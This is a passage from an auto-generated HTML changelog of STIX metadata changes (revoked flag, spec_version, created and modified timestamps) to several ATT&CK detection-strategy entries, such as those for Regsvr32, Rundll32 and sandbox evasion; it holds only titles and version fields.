style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0019] Detection Strategy for Stripped Payloads Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0442] Detection Strategy for Subvert Trust Controls using SIP and Trust Provider Hijacking.</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0056] Detection Strategy for Subvert Trust Controls via Install Root Certificate.</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0282] Detection Strategy for System Binary Proxy Execution: Regsvr32</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.668000+00:00</td></tr></tbody></table></details><hr><h4>[DET0565] Detection Strategy for System Language Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.686000+00:00</td></tr></tbody></table></details><hr><h4>[DET0043] Detection Strategy for System Location Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.686000+00:00</td></tr></tbody></table></details><hr><h4>[DET0421] Detection Strategy for System Services Service Execution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0279] Detection Strategy for System Services across OS platforms.</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0265] Detection Strategy for System Services: Launchctl</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0073] Detection Strategy for System Services: Systemctl</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0583] Detection Strategy for T1136 - Create Account across platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0319] Detection Strategy for T1136.003 - Cloud Account Creation across IaaS, IdP, SaaS, Office</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0475] Detection Strategy for T1218.011 Rundll32 Abuse</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.686000+00:00</td></tr></tbody></table></details><hr><h4>[DET0042] Detection Strategy for T1218.012 Verclsid Abuse</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.671000+00:00</td></tr></tbody></table></details><hr><h4>[DET0046] Detection Strategy for T1497 Virtualization/Sandbox Evasion</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: 